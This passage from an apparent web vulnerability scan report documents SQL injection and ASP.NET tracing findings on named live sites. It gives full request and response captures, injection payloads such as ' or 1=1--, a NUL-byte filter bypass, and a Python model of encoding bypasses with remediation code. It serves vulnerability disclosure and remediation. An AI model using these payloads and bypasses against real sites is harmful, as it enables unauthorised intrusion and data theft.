Error Occured:<BR><BR>Error # -2147217900 Unclosed quotation mark before the character string ''.<BR>SQL = Select _tbl_Listings.*, _tbl_Categories.txtName as txtCategory,_tbl_Categories.txtTitle as tx
...[SNIP]...

1.18. http://www.mybusinesslisting.com/favicon.ico [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The echoed statement, Select * from _tbl_Tags where txtName = ', shows what the sink is: the application extracts the search term from the q= parameter of a Google-style Referer and looks it up in _tbl_Tags by string concatenation. A Referer is set by the client, so this is reachable by anyone who sends a request, and the same -2147217900 / "Unclosed quotation mark" pair as in 1.17 identifies the database as Microsoft SQL Server.

The scanner reports that a plain quote is blocked and that a URL-encoded NULL byte (%00) in front of it bypasses the block. Only the %00' request is shown, so the blocking itself is not evidenced in this report; what is evidenced is that the NUL byte and the quote both reached the query.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses, and the tag lookup should take the search term as a bound parameter. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00'

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 148
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=DFGAHBODHBCNAIGHCHANCAMC; path=/
Cache-control: private

Error Occured:<BR><BR>Error # -2147217900 Unclosed quotation mark before the character string ''.<BR>SQL = Select * from _tbl_Tags where txtName = '

1.19. http://www.mybusinesslisting.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mybusinesslisting.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload 20620409'%20or%201%3d1--%20 was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. In the request the payload appears as ?120620409'%20or%201%3d1--%20=1 because the scanner's arbitrary parameter is named 1 and the payload is appended to that name. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server: the same -2147217900 (0x80040E14) code as in 1.17, this time with "Line 1: Incorrect syntax near '201'", against the same listings query. The parameter name, not just its value, reaches the query, so the handler is working from the raw query string rather than from parsed parameters.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses, and should not place any part of the raw query string into SQL; use bound parameters for the values it actually needs.

Request

GET /favicon.ico?120620409'%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 468
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=DEGAHBODBDMEMPECJEJHJALP; path=/
Cache-control: private

Error Occured:<BR><BR>Error # -2147217900 Line 1: Incorrect syntax near '201'.<BR>SQL = Select _tbl_Listings.*, _tbl_Categories.txtName as txtCategory,_tbl_Categories.txtTitle as txtCategoryTitle fro
...[SNIP]...

1.20. http://www.scrapblog.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scrapblog.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Neither captured response is a database error, so the SQL injection classification is not supported by this evidence. Response 1 (with %00') is an ASP.NET MVC 404 whose HTML comment carries an unhandled exception and stack trace: [HttpException]: The controller for path '/favicon.ico' was not found or does not implement IController. Response 2 (with %00'') is a 302 to /error.aspx?emt=2. The difference is best explained by the framework handling the NUL byte in the query string differently in the two cases, not by a query being altered.

What the capture does support is information disclosure: detailed ASP.NET exception output is returned to remote clients, and the X-AspNet-Version and X-AspNetMvc-Version headers advertise the framework versions.

Remediation detail

Configure ASP.NET custom errors so that exception detail is never sent to remote clients, remove the version headers, and reject request parameters that contain NUL bytes. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte; if a WAF is in place, ask the vendor to provide a fix for the NULL byte handling, but fix the application's error handling regardless.

Request 1

GET /favicon.ico?1%00'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scrapblog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3207

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
<!--
[HttpException]: The controller for path '/favicon.ico' was not found or does not implement IController.
at System.Web.Mvc.DefaultControllerFactory.GetControllerInstance(RequestContext requestContext, Type contr
...[SNIP]...

Request 2

GET /favicon.ico?1%00''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scrapblog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 Found
Date: Wed, 04 May 2011 03:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Location: /error.aspx?emt=2
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.aspx%3femt%3d2">here</a>.</h2>
</body></html>

1.21. http://www.thumb-store.com/favicon.ico [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thumb-store.com
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

As with 1.14 and 1.15, the "error" is a 417 Expectation Failed from Varnish, caused by the Expect header in the request rather than by the %00' payload, and the double-quote request was answered with a 302 to a domainsponsor.com parking favicon. Neither response contains a database error and the host (Server: Oversee Turing) is a parked domain; treat this as a false positive. The scanner's claim that a plain quote is blocked and that a leading NULL byte bypasses the block is not evidenced in the captured pair.

Remediation detail

None is warranted on this evidence. Where NULL byte bypasses are real they typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte; the fix belongs in the application code, with a WAF vendor fix as a secondary measure.
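The two filter bypasses this report refers to, double URL-encoding (%2527 in 1.10 and 1.14) and a leading NUL byte (%00' in 1.18, 1.20 and 1.21), both rely on the filter and the application seeing different strings. The model below is an added example for this page, not part of the XSS.CX output or of any scanned site, and its two actors are assumptions: a quote-blocking filter that inspects the value after a single URL-decode and, if it is native code, stops reading at the first NUL byte; and an application that may URL-decode the value once more before building its query. For header values the web server performs no decode at all, so every decode in that case is the application's own.

```python
from urllib.parse import unquote


def decode_n(raw: str, passes: int) -> str:
    """Apply URL-decoding `passes` times."""
    s = raw
    for _ in range(passes):
        s = unquote(s)
    return s


def filter_view(raw: str, native_strings: bool) -> str:
    """What a quote-blocking filter examines: the value after the one decode
    the web server performs, truncated at the first NUL if the filter is
    native code that treats strings as NUL-terminated (assumed model)."""
    s = decode_n(raw, 1)
    return s.split("\x00", 1)[0] if native_strings else s


def app_view(raw: str, app_decodes_again: bool) -> str:
    """What reaches the query builder: one decode by the server, plus an
    optional second decode done by the application itself (assumed model)."""
    return decode_n(raw, 2 if app_decodes_again else 1)


def filter_blocks(seen: str) -> bool:
    """The naive rule the scanner's wording implies: reject on a single quote."""
    return "'" in seen


def simulate(raw: str, native_strings: bool = False, app_decodes_again: bool = False) -> dict:
    """Trace one encoded payload through filter and application."""
    seen = filter_view(raw, native_strings)
    reaches = app_view(raw, app_decodes_again)
    return {
        "filter_sees": seen,
        "blocked": filter_blocks(seen),
        "app_sees": reaches,
        "quote_reaches_query": (not filter_blocks(seen)) and "'" in reaches,
    }


def canonical(raw: str, max_passes: int = 5) -> str:
    """Remediation: decode until the value stops changing, so that validation
    runs on the form the application will actually use."""
    s = raw
    for _ in range(max_passes):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s


def validate_after_canonicalisation(raw: str) -> bool:
    """Accept only values that are clean once fully decoded, and never accept
    an embedded NUL byte, whatever encoding it arrived in."""
    s = canonical(raw)
    return "\x00" not in s and "'" not in s
```

simulate("%2527", app_decodes_again=True) shows the filter examining %27, which contains no quote, while the application's second decode turns it into a bare '; with app_decodes_again=False the payload stays an inert %27, which is what the remediation text means by "no need to perform a second URL-decode". simulate("%00'", native_strings=True) shows a NUL-terminated filter seeing an empty string while the application receives \x00' intact.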

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thumb-store.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 03:19:01 GMT
X-Varnish: 2173852738
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd05.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thumb-store.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.22. http://www.truewoman.com/ [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL, and the page title identifies the application as MODx. The error text shows the failing statement continuing with '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0, i.e. an IP address, its reverse-DNS name (presumably those of the scanning client), an empty field and a timestamp. That is the shape of an INSERT that logs each visit, with the requested URL as the value immediately before the IP: the quote in id=224' ends that string early, the IP becomes a bare token, and MySQL fails at exactly that point. Because the sink is the request logger rather than the id handler, every path on the host triggers the same error (compare 1.23 to 1.25), and the error page echoes the caller's own address back to them.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. The logging statement should bind the requested URL, query string and Referer as parameters instead of concatenating them; all three are attacker-controlled on every request.

Request

GET /?id=224' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2043


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

1.23. http://www.truewoman.com/favicon.ic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL. This is the same visit-logging sink as in 1.22: /favicon.ic' produces the identical error, and the escaped form /favicon.ic'' is accepted by the query and yields the site's normal 404 page for a path that does not exist. The clean on/off behaviour between ' and '' is what raises the confidence to Certain.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses, and the logging statement should take the requested path as a bound parameter.

Request 1

GET /favicon.ic' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2046


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

Request 2

GET /favicon.ic'' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:24 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

1.24. http://www.truewoman.com/favicon.ic [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL, and the sink is again the visit logger of 1.22 and 1.23. This time the failing fragment begins '','173.193.214.243', ..., so the quote in the parameter name 1'=1 has closed a string value one field earlier than in 1.23; the extra empty string before the IP suggests that the query string and the path are stored in separate columns. The '' request is once more accepted and answered with the normal 404 page.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses; every request-derived column in the logging statement must be a bound parameter.

Request 1

GET /favicon.ic?1'=1 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:01 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2050


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '','173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-0' at line 1 &raquo;</b
...[SNIP]...

Request 2

GET /favicon.ic?1''=1 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

1.25. http://www.truewoman.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.truewoman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:10:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2047


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

1.26. http://www.truewoman.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php'?id=224 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:20:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2052


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=224','173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', ' at line 1 &raquo;</b
...[SNIP]...

1.27. http://www.truewoman.com/index.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php?id=224' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2043


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

2. ASP.NET tracing enabled
There are 4 instances of this issue:

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



2.1. http://www.endlessvacation.com/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.endlessvacation.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.endlessvacation.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:26:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4757

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.motion-vr.net/trace.axd

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motion-vr.net
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.motion-vr.net

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 04:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4705

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
